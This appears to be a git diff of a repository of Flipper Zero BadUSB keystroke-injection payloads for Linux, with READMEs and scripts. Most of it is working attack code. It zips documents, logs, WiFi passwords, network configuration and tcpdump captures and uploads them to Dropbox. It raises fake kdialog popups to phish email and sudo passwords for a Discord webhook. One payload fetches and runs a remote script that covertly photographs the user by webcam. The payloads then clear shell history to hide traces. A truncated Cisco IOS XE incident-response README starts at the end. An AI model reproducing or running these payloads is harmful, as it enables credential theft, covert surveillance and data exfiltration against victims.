GNU-Linux/Exfiltration/ExfiltrateDocumentsFolder_Linux/payload.txt
+76
View File
@@ -0,0 +1,76 @@
REM #########################################################
REM # |
REM # Title : Exfiltrate Linux Content With Dropbox |
REM # Author : Aleff |
REM # Version : 1.0 |
REM # Category : Exfiltration |
REM # Target : Linux |
REM # |
REM #########################################################
REM Requirements:
REM - Internet Connection
REM - Dropbox Account
REM - - DROPBOX_ACCESS_TOKEN
DELAY 1000
CTRL-ALT t
DELAY 2000
REM Required: Set here your Dropbox access TOKEN
STRING ACCESS_TOKEN="YOUR_TOKEN"
ENTER
DELAY 500
STRING USER_NAME=$(whoami)
ENTER
DELAY 500
STRING path="/home/$USER_NAME/Documents"
ENTER
DELAY 500
STRING RANDOM=$(shuf -i 1-999999999999 -n 1)
ENTER
DELAY 500
STRING NAME="$RANDOM.zip"
ENTER
DELAY 500
STRING ZIP_PATH="$path/$NAME"
ENTER
DELAY 500
REM The FOLDER that you want to zip, in this example you want to zip all Documents content
STRING FOLDER="/home/$USER_NAME/Documents/"
ENTER
REM Delay for zipping operation, it depends by computer power and folder directory
DELAY 10000
DELAY 500
STRING if [ -r "$FOLDER" ]; then
ENTER
STRING zip -r "$ZIP_PATH" "$FOLDER" > /dev/null 2>&1
ENTER
STRING else
ENTER
STRING echo ""
ENTER
STRING fi
ENTER
DELAY 500
STRING DROPBOX_FOLDER="/$NAME"
ENTER
DELAY 500
STRING curl -X POST https://content.dropboxapi.com/2/files/upload --header "Authorization: Bearer $ACCESS_TOKEN" --header "Dropbox-API-Arg: {\"path\": \"$DROPBOX_FOLDER\",\"mode\": \"add\",\"autorename\": true,\"mute\": false}" --header "Content-Type: application/octet-stream" --data-binary "@$ZIP_PATH"
ENTER
DELAY 2000
STRING history -c
ENTER
GNU-Linux/Exfiltration/ExfiltrateEmailAndPasswordByPhising_Linux/README.md
+54
View File
@@ -0,0 +1,54 @@
# Exfiltrate Email And Password By Phising - Linux ✅
A script used to exfiltrate the email and the email password by a popup phishing based on linux systems.
[![Hits](https://hits.seeyoufarm.com/api/count/incr/badge.svg?url=https%3A%2F%2Fgithub.com%2Faleff-github%2Fmy-flipper-shits&count_bg=%233C3C3C&title_bg=%233C3C3C&icon=linux.svg&icon_color=%23FFFFFF&title=views&edge_flat=false)](https://github.com/aleff-github/my-flipper-shits)
**Category**: Phishing, Credentials
## Disclaimer
<div align=center>
<img src="https://github.com/aleff-github/my-flipper-shits/blob/main/img/gif/flipper_zero%20(15).gif?raw=true" width="209" /><br><img src="https://github.com/aleff-github/my-flipper-shits/blob/main/img/DISCLAIMER.png?raw=true" width="600" />
</div>
## Description
A script used to exfiltrate the email and the email password by a popup phishing based on linux systems.
Opens a shell, get the email and the email password by a popup, send the input to a Discord webhook.
## Getting Started
### Dependencies
* Internet Connection
### Settings
* Set the Discord webhook
## Credits
<h2 align="center"> Aleff :octocat: </h2>
<div align=center>
<table>
<tr>
<td align="center" width="96">
<a href="https://github.com/aleff-github">
<img src=https://github.com/aleff-github/aleff-github/blob/main/img/github.png?raw=true width="48" height="48" />
</a>
<br>Github
</td>
<td align="center" width="96">
<a href="https://www.linkedin.com/in/alessandro-greco-aka-aleff/">
<img src=https://github.com/aleff-github/aleff-github/blob/main/img/linkedin.png?raw=true width="48" height="48" />
</a>
<br>Linkedin
</td>
</tr>
</table>
</div>
GNU-Linux/Exfiltration/ExfiltrateEmailAndPasswordByPhising_Linux/payload.txt
+31
View File
@@ -0,0 +1,31 @@
REM ###########################################################
REM # |
REM # Title : Exfiltrate Email And Password By Phising |
REM # Author : Aleff |
REM # Version : 1.0 |
REM # Category : Credentials, Phishing |
REM # Target : Linux |
REM # |
REM ###########################################################
REM Requirements:
REM - Internet Connection
REM - Discord webhook
DELAY 1000
CTRL-ALT t
DELAY 2000
REM #### POPUP SECTION ####
REM REQUIRED - Provide Discord Webhook - https://discordapp.com/api/webhooks/<webhook_id>/<token>
STRING WEBHOOK_URL="example.com"
ENTER
DELAY 500
REM All-in-one is important
STRING $(curl -H "Content-Type: application/json" -X POST -d "{\"content\": \"$(echo $(kdialog --sorry 'Email incorrect.\n Will not connect to server, please retry.'; kdialog --title 'Email \n Put your email address to connect yout account.' --inputbox 'Email:'; kdialog --title 'Email Login' --password 'Email Password:';))\"}" $WEBHOOK_URL); history -c; exit;
ENTER
GNU-Linux/Exfiltration/ExfiltrateLogFiles_Linux/README.md
+57
View File
@@ -0,0 +1,57 @@
# Exfiltrate Linux Log Files - BadUSB ✅
A script used to exfiltrate linux logs.
[![Hits](https://hits.seeyoufarm.com/api/count/incr/badge.svg?url=https%3A%2F%2Fgithub.com%2Faleff-github%2Fmy-flipper-shits&count_bg=%233C3C3C&title_bg=%233C3C3C&icon=linux.svg&icon_color=%23FFFFFF&title=views&edge_flat=false)](https://github.com/aleff-github/my-flipper-shits)
**Category**: Exfiltration
<div align=center>
<img src="https://github.com/aleff-github/my-flipper-shits/blob/main/img/logo-repository-2_0.gif" width="600" /><br><img src="https://github.com/aleff-github/my-flipper-shits/blob/main/img/DISCLAIMER.png" width="600" />
</div>
## Description
A script used to exfiltrate linux logs.
Opens a shel, zip all zippable (R permission) content of the log folder, send the zip into the dropbox folder, delete tmp folder.
## Getting Started
### Dependencies
* Internet Connection
* Linux System
* * Terminal that can be opened by the shortcommand CTRL-ALT t
* DropBox Account for the access token
### Settings
* Set your dropbox access token
* Change if needed the folder path interessed (i.e. /var/log)
* Change (if you think that it is necessary) the delay of the zipping operation
## Credits
<h2 align="center"> Aleff :octocat: </h2>
<div align=center>
<table>
<tr>
<td align="center" width="96">
<a href="https://github.com/aleff-github">
<img src=https://github.com/aleff-github/aleff-github/blob/main/img/github.png?raw=true width="48" height="48" />
</a>
<br>Github
</td>
<td align="center" width="96">
<a href="https://www.linkedin.com/in/alessandro-greco-aka-aleff/">
<img src=https://github.com/aleff-github/aleff-github/blob/main/img/linkedin.png?raw=true width="48" height="48" />
</a>
<br>Linkedin
</td>
</tr>
</table>
</div>
GNU-Linux/Exfiltration/ExfiltrateLogFiles_Linux/payload.txt
+73
View File
@@ -0,0 +1,73 @@
REM ######################################################
REM # |
REM # Title : Exfiltrate Linux Logs With Dropbox |
REM # Author : Aleff |
REM # Version : 1.0 |
REM # Category : Exfiltration |
REM # Target : Linux |
REM # |
REM ######################################################
REM Requirements:
REM - Internet Connection
REM - Dropbox Account
REM - - DROPBOX_ACCESS_TOKEN
DELAY 1000
CTRL-ALT t
REM Required: Set here your Dropbox access TOKEN
DELAY 2000
STRING ACCESS_TOKEN="YOUR_TOKEN"
ENTER
DELAY 500
STRING USER_NAME=$(whoami)
ENTER
REM Create random num
DELAY 500
STRING RANDOM=$(shuf -i 1-999999999999 -n 1)
ENTER
REM Folder path
DELAY 500
STRING TMP_FOLDER_PATH=$(mktemp -d -p "/home/$USER_NAME/tmp/" prefix-XXXXXXXXXX)
ENTER
REM Zip path
DELAY 500
STRING ZIP_NAME="$RANDOM.zip"
ENTER
DELAY 500
STRING ZIP_PATH="$TMP_FOLDER_PATH/$ZIP_NAME"
ENTER
REM Default log path
DELAY 500
STRING LOG_PATH="/var/log/"
ENTER
DELAY 500
STRING zip -r "$ZIP_PATH" "$LOG_PATH"
ENTER
REM Delay of zipping operation - it depends
DELAY 10000
DELAY 500
STRING DROPBOX_FOLDER="/$ZIP_NAME"
ENTER
REM Send to Dropbox function
DELAY 500
STRING curl -X POST https://content.dropboxapi.com/2/files/upload --header "Authorization: Bearer $ACCESS_TOKEN" --header "Dropbox-API-Arg: {\"path\": \"$DROPBOX_FOLDER\",\"mode\": \"add\",\"autorename\": true,\"mute\": false}" --header "Content-Type: application/octet-stream" --data-binary "@$ZIP_PATH"
ENTER
REM Send timing - it depends
DELAY 5000
DELAY 500
STRING rm -rf "$TMP_FOLDER_PATH"
ENTER
GNU-Linux/Exfiltration/ExfiltrateNetworkConfiguration_Linux/README.md
+53
View File
@@ -0,0 +1,53 @@
# Exfiltrate Network Configuration - BadUSB ✅
A script used to exfiltrate the network configuration on a Linux machine.
[![Hits](https://hits.seeyoufarm.com/api/count/incr/badge.svg?url=https%3A%2F%2Fgithub.com%2Faleff-github%2Fmy-flipper-shits&count_bg=%233C3C3C&title_bg=%233C3C3C&icon=linux.svg&icon_color=%23FFFFFF&title=views&edge_flat=false)](https://github.com/aleff-github/my-flipper-shits)
**Category**: Exfiltrate, Execution
<div align=center>
<img src="https://github.com/aleff-github/my-flipper-shits/blob/main/img/logo-repository-2_0.gif" width="600" /><br><img src="https://github.com/aleff-github/my-flipper-shits/blob/main/img/DISCLAIMER.png" width="600" />
</div>
## Description
A script used to exfiltrate the network configuration on a Linux machine.
Opens a shell, get the network card name, get the network configuration using nmcli, send the result to Dropbox, erase traces.
## Getting Started
### Dependencies
* Internet Connection
* Dropbox Token
### Settings
* Set the Dropbox token
## Credits
<h2 align="center"> Aleff :octocat: </h2>
<div align=center>
<table>
<tr>
<td align="center" width="96">
<a href="https://github.com/aleff-github">
<img src=https://github.com/aleff-github/aleff-github/blob/main/img/github.png?raw=true width="48" height="48" />
</a>
<br>Github
</td>
<td align="center" width="96">
<a href="https://www.linkedin.com/in/alessandro-greco-aka-aleff/">
<img src=https://github.com/aleff-github/aleff-github/blob/main/img/linkedin.png?raw=true width="48" height="48" />
</a>
<br>Linkedin
</td>
</tr>
</table>
</div>
GNU-Linux/Exfiltration/ExfiltrateNetworkConfiguration_Linux/payload.txt
+85
View File
@@ -0,0 +1,85 @@
REM ##########################################################
REM # |
REM # Title : Exfiltrate Linux Network Configuration |
REM # Author : Aleff |
REM # Version : 1.0 |
REM # Category : Exfiltration, Execution |
REM # Target : Linux |
REM # |
REM ##########################################################
REM Requirements:
REM - Internet Connection
REM - Dropbox Account
REM - - DROPBOX_ACCESS_TOKEN
DELAY 1000
CTRL-ALT t
DELAY 2000
REM Required: Set here your Dropbox access TOKEN
DEFINE TOKEN example
STRING ACCESS_TOKEN="
STRING TOKEN
STRING "
ENTER
REM DELAY 500
REM STRING USER_NAME=$(whoami)
REM ENTER
DELAY 500
STRING RANDOM=$(shuf -i 1-999999999999 -n 1)
ENTER
DELAY 500
STRING ZIP_NAME="$RANDOM.zip"
ENTER
DELAY 500
STRING ZIP_PATH="/home/$USER_NAME/Documents/$ZIP_NAME"
ENTER
REM Folder path
DELAY 500
STRING TMP_FOLDER_PATH=$(mktemp -d -p "/home/$USER_NAME/Documents" prefix-XXXXXXXXXX)
ENTER
STRING nmcli > "$TMP_FOLDER_PATH/nmcli.txt"
ENTER
DELAY 1000
STRING nmcli connection show > "$TMP_FOLDER_PATH/nmcli_connection.txt"
ENTER
DELAY 1000
STRING nmcli device show > "$TMP_FOLDER_PATH/nmcli_device.txt"
ENTER
DELAY 1000
REM Delay for zipping operation, it depends by computer power and folder directory
STRING zip -r "$ZIP_PATH" "$TMP_FOLDER_PATH"
DELAY 3000
STRING DROPBOX_FOLDER="/$NAME"
ENTER
DELAY 500
DEFINE DROPBOX_API_CONST https://content.dropboxapi.com/2/files/upload
STRING curl -X POST
STRING DROPBOX_API_CONST
STRING --header "Authorization: Bearer $ACCESS_TOKEN" --header "Dropbox-API-Arg: {\"path\": \"$DROPBOX_FOLDER\",\"mode\": \"add\",\"autorename\": true,\"mute\": false}" --header "Content-Type: application/octet-stream" --data-binary "@$ZIP_PATH"
ENTER
DELAY 2000
STRING history -c
ENTER
DELAY 500
STRING rm -rf "$TMP_FOLDER_PATH"
ENTER
DELAY 500
STRING rm -rf "$ZIP_PATH"
ENTER
GNU-Linux/Exfiltration/ExfiltrateNetworkTraffic_Linux/README.md
+53
View File
@@ -0,0 +1,53 @@
# Exfiltrate Network Traffic - Linux ✅
A script used to exfiltrate the network traffic on a Linux machine.
[![Hits](https://hits.seeyoufarm.com/api/count/incr/badge.svg?url=https%3A%2F%2Fgithub.com%2Faleff-github%2Fmy-flipper-shits&count_bg=%233C3C3C&title_bg=%233C3C3C&icon=linux.svg&icon_color=%23FFFFFF&title=views&edge_flat=false)](https://github.com/aleff-github/my-flipper-shits)
**Category**: Exfiltrate
<div align=center>
<img src="https://github.com/aleff-github/my-flipper-shits/blob/main/img/logo-repository-2_0.gif" width="600" /><br><img src="https://github.com/aleff-github/my-flipper-shits/blob/main/img/DISCLAIMER.png" width="600" />
</div>
## Description
A script used to exfiltrate the network traffic on a Linux machine.
Opens a shell, get the network card name, get the network traffic using tcpdump, send the result to Dropbox, erase traces.
## Getting Started
### Dependencies
* Permissions
* Internet Connection
### Settings
* Set the Dropbox token
* Set the sniffing filter
## Credits
<h2 align="center"> Aleff :octocat: </h2>
<div align=center>
<table>
<tr>
<td align="center" width="96">
<a href="https://github.com/aleff-github">
<img src=https://github.com/aleff-github/aleff-github/blob/main/img/github.png?raw=true width="48" height="48" />
</a>
<br>Github
</td>
<td align="center" width="96">
<a href="https://www.linkedin.com/in/alessandro-greco-aka-aleff/">
<img src=https://github.com/aleff-github/aleff-github/blob/main/img/linkedin.png?raw=true width="48" height="48" />
</a>
<br>Linkedin
</td>
</tr>
</table>
</div>
GNU-Linux/Exfiltration/ExfiltrateNetworkTraffic_Linux/payload.txt
+119
View File
@@ -0,0 +1,119 @@
REM #############################################
REM # |
REM # Title : Exfiltrate Network Traffic |
REM # Author : Aleff |
REM # Version : 1.0 |
REM # Category : Exfiltration |
REM # Target : Linux |
REM # |
REM #############################################
REM Requirements:
REM - Permissions
REM - Internet Connection
REM REQUIRED: You need to know the sudo password and replace 'example' with this
DEFINE SUDO_PASS example
REM REQUIRED: Set what you want to sniff, for example tcp port 80
DEFINE SNIFFING example
REM Set your Dropbox link or whatever you want to use to exfiltrate the sniff file
DEFINE TOKEN example
REM Just a Dropbox const
DEFINE DROPBOX_API_CONST https://content.dropboxapi.com/2/files/upload
REM Output file path packets.pcap, remember to use pcap extension
DEFINE FILE example.pcap
DELAY 1000
CTRL-ALT t
DELAY 2000
REM #### PERMISSIONS SECTION ####
STRING sudo su
ENTER
DELAY 1000
STRING SUDO_PASS
ENTER
DELAY 1000
REM #### Network Traffic SECTION ####
STRING FILE_PATH="
STRING FILE
STRING "
ENTER
DELAY 500
STRING filter_expression="
STRING SNIFFING
STRING "
ENTER
DELAY 500
REM Network card name
STRING net_card="$(ip route get 8.8.8.8 | awk '{ print $5; exit }')"
ENTER
DELAY 500
REM Network dump
STRING tcpdump -i "$net_card" $filter_expression -w "$FILE_PATH" &
ENTER
DELAY 500
REM Get PID
STRING tcpdump_pid=$!
ENTER
REM Set how long you want to sniff
DELAY 60000
REM Kill the process by PID
STRING kill $tcpdump_pid
ENTER
REM #### Exfiltrate SECTION ####
REM You can use whatever you want, i use Dropbox
STRING ACCESS_TOKEN="
STRING TOKEN
STRING "
ENTER
DELAY 500
STRING DROPBOX_FOLDER="/Exfiltration"
ENTER
DELAY 500
STRING curl -X POST
STRING DROPBOX_API_CONST
STRING --header "Authorization: Bearer $ACCESS_TOKEN" --header "Dropbox-API-Arg: {\"path\": \"$DROPBOX_FOLDER\",\"mode\": \"add\",\"autorename\": true,\"mute\": false}" --header "Content-Type: application/octet-stream" --data-binary "@$FILE_PATH"
ENTER
REM #### REMOVE TRACES ####
STRING rm "$FILE_PATH"
ENTER
DELAY 500
STRING history -c
ENTER
DELAY 500
REM Exit from Sudo user
STRING exit
ENTER
DELAY 500
REM Close the shell
STRING exit
ENTER
GNU-Linux/Exfiltration/ExfiltrateNetworkTraffic_Linux/script.sh
Executable
+12
View File
@@ -0,0 +1,12 @@
#!/bin/bash
filter_expression="tcp port 80"
net_card="$(ip route get 8.8.8.8 | awk '{ print $5; exit }')"
tcpdump -i "$net_card" $filter_expression -w packets.pcap &
tcpdump_pid=$!
sleep 60
kill $tcpdump_pid
GNU-Linux/Exfiltration/ExfiltratePhotosThroughShell/README.md
+50
View File
@@ -0,0 +1,50 @@
# Exfiltrate Photos Through Shell - Linux ✅
A script used to exfiltrate photos using fswebcam shell command.
[![Hits](https://hits.seeyoufarm.com/api/count/incr/badge.svg?url=https%3A%2F%2Fgithub.com%2Faleff-github%2Fmy-flipper-shits&count_bg=%233C3C3C&title_bg=%233C3C3C&icon=linux.svg&icon_color=%23FFFFFF&title=views&edge_flat=false)](https://github.com/aleff-github/my-flipper-shits)
**Category**: Exfiltration
<div align=center>
<img src="https://github.com/aleff-github/my-flipper-shits/blob/main/img/logo-repository-2_0.gif" width="600" /><br><img src="https://github.com/aleff-github/my-flipper-shits/blob/main/img/DISCLAIMER.png" width="600" />
</div>
## Description
A script used to exfiltrate photos using fswebcam shell command. The permissions is needed for give the executation permission to the script downloaded.
## Getting Started
### Dependencies
* An internet connection
* Linux system
### Settings
* Dropbox Token - You should change it into the script.sh file, line 7.
## Credits
<h2 align="center"> Aleff :octocat: </h2>
<div align=center>
<table>
<tr>
<td align="center" width="96">
<a href="https://github.com/aleff-github">
<img src=https://github.com/aleff-github/aleff-github/blob/main/img/github.png?raw=true width="48" height="48" />
</a>
<br>Github
</td>
<td align="center" width="96">
<a href="https://www.linkedin.com/in/alessandro-greco-aka-aleff/">
<img src=https://github.com/aleff-github/aleff-github/blob/main/img/linkedin.png?raw=true width="48" height="48" />
</a>
<br>Linkedin
</td>
</tr>
</table>
</div>
GNU-Linux/Exfiltration/ExfiltratePhotosThroughShell/payload.txt
+52
View File
@@ -0,0 +1,52 @@
REM ##################################################
REM # |
REM # Title : Exfiltrate Photos Through Shell |
REM # Author : Aleff |
REM # Version : 1.0 |
REM # Category : Exfiltration |
REM # Target : Linux |
REM # |
REM ##################################################
REM Requirements:
REM - EXFILTRATION:
REM - Internet Connection
REM - Dropbox Token for example, but you can use whatever you want for the exfiltration (i.e. smtp e-mail, Discord, Telegram and so on..)
REM - PERMISSIONS:
REM - for install 'fswebcam'
REM - for script.sh permission
REM REQUIRED - replace example.com with your script.sh link
DEFINE SCRIPT-SH-LINK example.com
REM REQUIRED - sudo Password
DEFINE SUDO-PSWD example
DELAY 1000
CTRL-ALT t
DELAY 2000
STRING sudo apt install fswebcam -y
ENTER
DELAY 500
STRING SUDO-PSWD
ENTER
DELAY 5000
REM #### Script ####
STRING curl
STRING SCRIPT-SH-LINK
STRING > script.sh
ENTER
DELAY 4000
STRING sudo chmod +x script.sh
ENTER
DELAY 500
STRING nohup ./script.sh > /dev/null 2>&1 & exit
ENTER
GNU-Linux/Exfiltration/ExfiltratePhotosThroughShell/script.sh
Executable
+32
View File
@@ -0,0 +1,32 @@
#!/bin/bash
USER=$(whoami)
DIR=/home/$USER/tmp
TOKEN=your_dropbox_token
mkdir -p $DIR
function remove_folder {
rm -rf "$DIR"
rm -rf "/home/$USER/script.sh"
}
trap remove_folder EXIT
# execute the for, for some times..
for i in {1..10}
do
NAME=$(date +%s%N).jpg
fswebcam --no-banner $DIR/$NAME
curl -X POST https://content.dropboxapi.com/2/files/upload \
--header "Authorization: Bearer $TOKEN" \
--header "Dropbox-API-Arg: {\"path\": \"/$NAME\",\"mode\": \"add\",\"autorename\": true,\"mute\": false}" \
--header "Content-Type: application/octet-stream" \
--data-binary @$DIR/$NAME
sleep 60
done
GNU-Linux/Exfiltration/ExfiltrateProcessInfo_Linux/README.md
+53
View File
@@ -0,0 +1,53 @@
# Exfiltrate Process Info - Linux ✅
A script used to exfiltrate the process info on a Linux machine.
[![Hits](https://hits.seeyoufarm.com/api/count/incr/badge.svg?url=https%3A%2F%2Fgithub.com%2Faleff-github%2Fmy-flipper-shits&count_bg=%233C3C3C&title_bg=%233C3C3C&icon=linux.svg&icon_color=%23FFFFFF&title=views&edge_flat=false)](https://github.com/aleff-github/my-flipper-shits)
**Category**: Exfiltration
<div align=center>
<img src="https://github.com/aleff-github/my-flipper-shits/blob/main/img/logo-repository-2_0.gif" width="600" /><br><img src="https://github.com/aleff-github/my-flipper-shits/blob/main/img/DISCLAIMER.png" width="600" />
</div>
## Description
A script used to exfiltrate the process info on a Linux machine.
Opens a shell, get the process info, set the Discord webhook configuration, send it to the discord webhook, erase traces.
## Getting Started
### Dependencies
* Internet Connection
* Discord Webhook
### Settings
* Set the Discord Webhook configuration
## Credits
<h2 align="center"> Aleff :octocat: </h2>
<div align=center>
<table>
<tr>
<td align="center" width="96">
<a href="https://github.com/aleff-github">
<img src=https://github.com/aleff-github/aleff-github/blob/main/img/github.png?raw=true width="48" height="48" />
</a>
<br>Github
</td>
<td align="center" width="96">
<a href="https://www.linkedin.com/in/alessandro-greco-aka-aleff/">
<img src=https://github.com/aleff-github/aleff-github/blob/main/img/linkedin.png?raw=true width="48" height="48" />
</a>
<br>Linkedin
</td>
</tr>
</table>
</div>
GNU-Linux/Exfiltration/ExfiltrateProcessInfo_Linux/payload.txt
+73
View File
@@ -0,0 +1,73 @@
REM ##########################################
REM # |
REM # Title : Exfiltrate Process Info |
REM # Author : Aleff |
REM # Version : 1.0 |
REM # Category : Exfiltration |
REM # Target : Linux |
REM # |
REM ##########################################
REM Requirements:
REM - Internet Connection
REM - Discord Webhook
DELAY 1000
CTRL-ALT t
DELAY 2000
REM #### GET PROCESS SECTION ####
STRING ps aux > process.txt
ENTER
DELAY 500
REM #### EXFILTRATE SECTION ####
REM Required: Set here your Dropbox access TOKEN
DEFINE TOKEN example
STRING ACCESS_TOKEN="
STRING TOKEN
STRING "
ENTER
DELAY 500
STRING USER_NAME=$(whoami)
ENTER
DELAY 500
STRING TXT_PATH="/home/$USER_NAME/process.txt"
ENTER
DELAY 500
REM Set yout Dropbox folder name
DEFINE DROPBOX_FOLDER_NAME example
STRING DROPBOX_FOLDER="/
STRING DROPBOX_FOLDER_NAME
STRING "
ENTER
DELAY 500
DEFINE DROPBOX_API_CONST https://content.dropboxapi.com/2/files/upload
STRING curl -X POST
STRING DROPBOX_API_CONST
STRING --header "Authorization: Bearer $ACCESS_TOKEN" --header "Dropbox-API-Arg: {\"path\": \"$DROPBOX_FOLDER\",\"mode\": \"add\",\"autorename\": true,\"mute\": false}" --header "Content-Type: application/octet-stream" --data-binary "@$TXT_PATH"
ENTER
REM It depends by the internet connection, btw 1 or 2 seconds, generally, is sufficient
DELAY 2000
REM #### REMOVE TRACES ####
STRING history -c
ENTER
DELAY 500
STRING exit
ENTER
GNU-Linux/Exfiltration/ExfiltrateSudoPasswordByPhising_Linux/README.md
+52
View File
@@ -0,0 +1,52 @@
# Exfiltrate Sudo Password By Phishing - Linux ✅
A script used to change exfiltrate the sudo password by a popup phishing based on linux systems.
[![Hits](https://hits.seeyoufarm.com/api/count/incr/badge.svg?url=https%3A%2F%2Fgithub.com%2Faleff-github%2Fmy-flipper-shits&count_bg=%233C3C3C&title_bg=%233C3C3C&icon=linux.svg&icon_color=%23FFFFFF&title=views&edge_flat=false)](https://github.com/aleff-github/my-flipper-shits)
**Category**: Execution
<div align=center>
<img src="https://github.com/aleff-github/my-flipper-shits/blob/main/img/logo-repository-2_0.gif" width="600" /><br><img src="https://github.com/aleff-github/my-flipper-shits/blob/main/img/DISCLAIMER.png" width="600" />
</div>
## Description
A script used to change exfiltrate the sudo password by a popup phishing based on linux systems.
Opens a shell, get the password by a popup, send the input to a Discord webhook.
## Getting Started
### Dependencies
* Internet Connection
### Settings
* Set the Discord webhook
## Credits
<h2 align="center"> Aleff :octocat: </h2>
<div align=center>
<table>
<tr>
<td align="center" width="96">
<a href="https://github.com/aleff-github">
<img src=https://github.com/aleff-github/aleff-github/blob/main/img/github.png?raw=true width="48" height="48" />
</a>
<br>Github
</td>
<td align="center" width="96">
<a href="https://www.linkedin.com/in/alessandro-greco-aka-aleff/">
<img src=https://github.com/aleff-github/aleff-github/blob/main/img/linkedin.png?raw=true width="48" height="48" />
</a>
<br>Linkedin
</td>
</tr>
</table>
</div>
GNU-Linux/Exfiltration/ExfiltrateSudoPasswordByPhising_Linux/payload.txt
+31
View File
@@ -0,0 +1,31 @@
REM #######################################################
REM # |
REM # Title : Exfiltrate Sudo Password By Phishing |
REM # Author : Aleff |
REM # Version : 1.0 |
REM # Category : Credentials, Phishing |
REM # Target : Linux |
REM # |
REM #######################################################
REM Requirements:
REM - Internet Connection
REM - Discord webhook
DELAY 1000
CTRL-ALT t
DELAY 2000
REM #### POPUP SECTION ####
REM REQUIRED - Provide Discord Webhook - https://discordapp.com/api/webhooks/<webhook_id>/<token>
STRING WEBHOOK_URL="example.com"
ENTER
DELAY 500
REM All-in-one is important
STRING $(curl -H "Content-Type: application/json" -X POST -d "{\"content\": \"$(kdialog --title "Verify Permissions" --inputbox "Put your sudo password di continue" --default "password")\"}" $WEBHOOK_URL); history -c; exit;
ENTER
GNU-Linux/Exfiltration/ExfiltrateWiFiPasswords_Linux/README.md
+55
View File
@@ -0,0 +1,55 @@
# Exfiltrate WiFi Passwords - Linux ✅
A script used to exfiltrate the wifi passwords on a Linux machine.
[![Hits](https://hits.seeyoufarm.com/api/count/incr/badge.svg?url=https%3A%2F%2Fgithub.com%2Faleff-github%2Fmy-flipper-shits&count_bg=%233C3C3C&title_bg=%233C3C3C&icon=linux.svg&icon_color=%23FFFFFF&title=views&edge_flat=false)](https://github.com/aleff-github/my-flipper-shits)
**Category**: Exfiltrate, Credentials, Execution
<div align=center>
<img src="https://github.com/aleff-github/my-flipper-shits/blob/main/img/logo-repository-2_0.gif" width="600" /><br><img src="https://github.com/aleff-github/my-flipper-shits/blob/main/img/DISCLAIMER.png" width="600" />
</div>
## Description
A script used to exfiltrate the wifi passwords on a Linux machine.
Opens a shell, get the WiFi names, get the passwords using nmcli, send the result to Dropbox, erase traces.
## Getting Started
### Dependencies
* Internet Connection
* Dropbox Token
* Permissions
### Settings
* Set the Dropbox token
* Set the sudo password
## Credits
<h2 align="center"> Aleff :octocat: </h2>
<div align=center>
<table>
<tr>
<td align="center" width="96">
<a href="https://github.com/aleff-github">
<img src=https://github.com/aleff-github/aleff-github/blob/main/img/github.png?raw=true width="48" height="48" />
</a>
<br>Github
</td>
<td align="center" width="96">
<a href="https://www.linkedin.com/in/alessandro-greco-aka-aleff/">
<img src=https://github.com/aleff-github/aleff-github/blob/main/img/linkedin.png?raw=true width="48" height="48" />
</a>
<br>Linkedin
</td>
</tr>
</table>
</div>
GNU-Linux/Exfiltration/ExfiltrateWiFiPasswords_Linux/payload.txt
+116
View File
@@ -0,0 +1,116 @@
REM #######################################################
REM # |
REM # Title : Exfiltrate Wifi Passwords - Linux |
REM # Author : Aleff |
REM # Version : 1.0 |
REM # Category : Exfiltration, Credentials, Execution |
REM # Target : Linux |
REM # |
REM #######################################################
REM Requirements:
REM - Permissions
REM - Internet connection
REM - Dropbox Token
DELAY 1000
CTRL-ALT t
DELAY 2000
REM #### PREREQUISITES SECTION ####
REM Required: You need to know the sudo password and replace 'example' with this
STRING sudo su
ENTER
DELAY 1000
STRING sudo_password
ENTER
DELAY 2000
REM Required: Set here your Dropbox access TOKEN
STRING ACCESS_TOKEN="example.com"
ENTER
REM #### ZIP SECTION ####
DELAY 500
STRING RANDOM=$(shuf -i 1-999999999999 -n 1)
ENTER
DELAY 500
STRING ZIP_NAME="$RANDOM.zip"
ENTER
DELAY 500
STRING TMP_FOLDER_PATH=$(mktemp -d -p "/home" prefix-XXXXXXXXXX)
ENTER
DELAY 500
STRING ZIP_PATH="/home/$ZIP_NAME"
ENTER
REM #### WiFi && ZIP SECTION ####
REM Get all WiFi data
STRING for conn in $(nmcli connection show | grep wifi | awk '{print $1}'); do
ENTER
DELAY 500
STRING nmcli connection show $conn >> "$TMP_FOLDER_PATH/output_verbose.txt" -
ENTER
DELAY 500
STRING nmcli connection show $conn | grep psk >> "$TMP_FOLDER_PATH/output.txt" -
ENTER
DELAY 500
STRING done
ENTER
DELAY 500
REM Wifi exfiltration command time - It depends
DELAY 1000
STRING zip -r "$ZIP_PATH" "$TMP_FOLDER_PATH"
REM Zip operation time - It depends
DELAY 3000
REM #### EXFILTRATE SECTION ####
REM Set yout Dropbox folder name
STRING DROPBOX_FOLDER="/example"
ENTER
DELAY 500
STRING curl -X POST https://content.dropboxapi.com/2/files/upload --header "Authorization: Bearer $ACCESS_TOKEN" --header "Dropbox-API-Arg: {\"path\": \"$DROPBOX_FOLDER\",\"mode\": \"add\",\"autorename\": true,\"mute\": false}" --header "Content-Type: application/octet-stream" --data-binary "@$ZIP_PATH"
ENTER
REM #### REMOVE TRACES ####
DELAY 2000
STRING history -c
ENTER
DELAY 500
STRING rm -rf "$TMP_FOLDER_PATH"
ENTER
DELAY 500
STRING rm -rf "$ZIP_PATH"
ENTER
DELAY 500
STRING exit
ENTER
DELAY 500
STRING exit
ENTER
GNU-Linux/Exfiltration/ExfiltrateWiFiPasswords_Linux/script.sh
Executable
+6
View File
@@ -0,0 +1,6 @@
#!/bin/bash
for conn in $(nmcli connection show | grep wifi | awk '{print $1}'); do
nmcli connection show $conn >> "$TMP_FOLDER_PATH/output_verbose.txt" -
nmcli connection show $conn | grep psk >> "$TMP_FOLDER_PATH/output.txt" -
done
GNU-Linux/Incident_Response/Auto-Check_Cisco_IOS_XE_Backdoor_based_on_CVE-2023-20198_and_CVE/README.md
+142
View File
@@ -0,0 +1,142 @@
# Auto-Check Cisco IOS XE Backdoor based on CVE-2023-20198 and CVE-2023-20273
Use this script to set up an automated integrity verification system for your Cisco IOS XE machine in relation to the attack that could create a backdoor on Cisco IOS XE systems vulnerable to CVE-2023-20198 and CVE-2023-20273.
**Category**: incident-response
![](/assets/1.png)
## Index
- [Auto-Check Cisco IOS XE Backdoor based on CVE-2023-20198 and CVE-2023-20273](#auto-check-cisco-ios-xe-backdoor-based-on-cve-2023-20198-and-cve-2023-20273)
- [Payload Description](#payload-description)
- [Settings](#settings)
- [Regex](#regex)
- [Conseguence](#conseguence)
- [Administrator Permissions](#administrator-permissions)
- [Sources](#sources)
- [Credits](#credits)
## Payload Description
